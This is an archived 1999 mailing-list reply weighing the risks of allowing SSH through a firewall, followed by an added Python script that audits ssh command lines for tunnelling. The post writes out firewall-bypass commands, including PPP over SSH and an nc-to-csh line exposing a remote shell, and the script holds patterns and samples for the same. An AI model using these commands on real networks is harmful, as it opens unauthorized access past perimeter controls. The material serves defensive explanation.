Firewall Wizards mailing list archives

Re: SSH through firewall


From: James Neal - HandiCAT <neal () ee pdx edu>
Date: Mon, 05 Jul 1999 21:24:48 -0700

In message <782FA6543FA5D111933D0000F86AEFA8019AA0C1 () simail5 si bosch de> you write:
> I'm thinking about allowing users in the trusted network to do ssh
> through a non-transparent application gateway firewall into an
> untrusted network.
> Do you think this is "secure"? I'm not sure because users can tunnel
> all kinds of protocols in ssh. What would be possible attacks?

Given the alternatives (ftp and telnet), I'd say SSH is a wonderful
choice.

That being said, some of "The bad" of SSH.
  o  Straight ssh-- directly from the source at ftp.cs.hut.fi-- allows
  users to forward ports from the outside machine across their secure
  channel to arbitrary ports on hosts inside your firewall.

  o  It's quite possible to run PPP over SSH.   In fact, there's a HOWTO
  about doing just that in the Linux world. It's basically just a
  # ssh remotehost pppd | pppd

  o  Related to the first two items.  There's nothing keeping a user
  from doing an "ssh remotehost nc -l 4060 | csh", to allow people to
  run shell commands by just connecting to port 4060 of the remote
  machine.

Of course, tools exist that allow one to bypass a firewall using HTTP,
telnet, and the r* services as well, so if you /do/ allow SSH through,
at least their hax0r packets will be going over an encrypted tunnel and
not being sniffed or hijacked. :)

> Do you think this is feasible with a non-transparent firewall? Do you know
> a firewall that is capable of this?

Urg.. Beats me.  I don't even know how SSH would function over a 
non-transparent firewall.

-James

--
James Neal <jfneal () intermedia com>
Senior Systems Administrator - Intermedia Communications
I don't speak for Intermedia, yadadada.
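
An added example, not part of the original post: a small audit that flags the tunnelling patterns listed above (port forwards, and pppd or nc run as the remote command) in recorded ssh client command lines. It assumes such command lines are available from process accounting or similar on the trusted hosts; the hostnames and sample lines are constructed.

```python
import shlex

# OpenSSH client option letters that consume an argument (see ssh(1)).
OPTS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")
FORWARD_FLAGS = {"L": "local port forward", "R": "remote port forward",
                 "D": "dynamic (SOCKS) forward"}
FORWARD_KEYWORDS = ("localforward", "remoteforward", "dynamicforward")
# Remote programs the post names as tunnel endpoints.
TUNNEL_PROGRAMS = {"pppd", "nc"}

def audit_ssh_command(cmdline):
    """Return a list of findings for one recorded ssh client command line."""
    argv = shlex.split(cmdline)
    if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
        return []
    findings = []
    i = 1
    # Options precede the host; everything after the host is the remote command.
    while i < len(argv) and argv[i].startswith("-") and len(argv[i]) > 1:
        cluster = argv[i][1:]
        i += 1
        for pos, flag in enumerate(cluster):
            if flag not in OPTS_WITH_ARG:
                continue
            value = cluster[pos + 1:]          # form: -R8023:host:23
            if not value and i < len(argv):    # form: -R 8023:host:23
                value = argv[i]
                i += 1
            if flag in FORWARD_FLAGS:
                findings.append(f"{FORWARD_FLAGS[flag]}: {value}")
            elif flag == "o" and value.lower().startswith(FORWARD_KEYWORDS):
                findings.append(f"forwarding set via -o: {value}")
            break  # the rest of the cluster was this option's argument
    # argv[i] is the host; re-split so a quoted remote command is tokenized too.
    for token in shlex.split(" ".join(argv[i + 1:])):
        if token.rsplit("/", 1)[-1] in TUNNEL_PROGRAMS:
            findings.append(f"remote command runs {token}")
    return findings

# Constructed sample command lines (not taken from the post).
SAMPLES = [
    "ssh -fNR8023:inside-host:23 remotehost",
    "ssh -p 22 remotehost pppd",
    "ssh remotehost 'nc -l 4060'",
    "ssh -p 2222 remotehost uptime",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", audit_ssh_command(line) or "no findings")
```

This only sees what the client was asked to do on its command line; forwards configured in a user's own ssh configuration file would need that file audited as well.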


